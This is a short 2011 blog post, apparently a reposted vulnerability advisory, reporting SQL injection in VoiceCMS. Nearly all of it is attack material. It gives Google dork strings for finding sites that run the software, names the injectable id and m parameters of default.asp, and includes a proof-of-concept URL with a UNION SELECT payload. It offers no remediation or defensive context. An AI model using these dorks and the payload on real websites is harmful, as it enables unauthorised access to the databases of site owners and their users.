VoiceCMS Vulnerable to SQL Injection ~ Random stuff by yappare

Tuesday, March 15, 2011

VoiceCMS Vulnerable to SQL Injection

on March 15, 2011 No comments

Title : VoiceCMS Vulnerable to SQL Injection
Vendor : http://www.voicecms.ca
Found by : p0pc0rn
Dork
: intext:"Powered by VoiceCMS"
: intext:"powered by triware"

SQL - Jet Engine Database Error
-------------------------------
Parameter
http://site.com/default.asp?com=[Page]&id=[SQL]&m=[id]
http://site.com/default.asp?com=[Page]&id=[id]&m=[SQL]

POC
---
http://site.com/default.asp?com=PhotoGallery&id=1 union select 0 from test.a&m=1

thanks,
-p0pc0rn-

Random stuff by yappare

Tuesday, March 15, 2011

VoiceCMS Vulnerable to SQL Injection

0 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories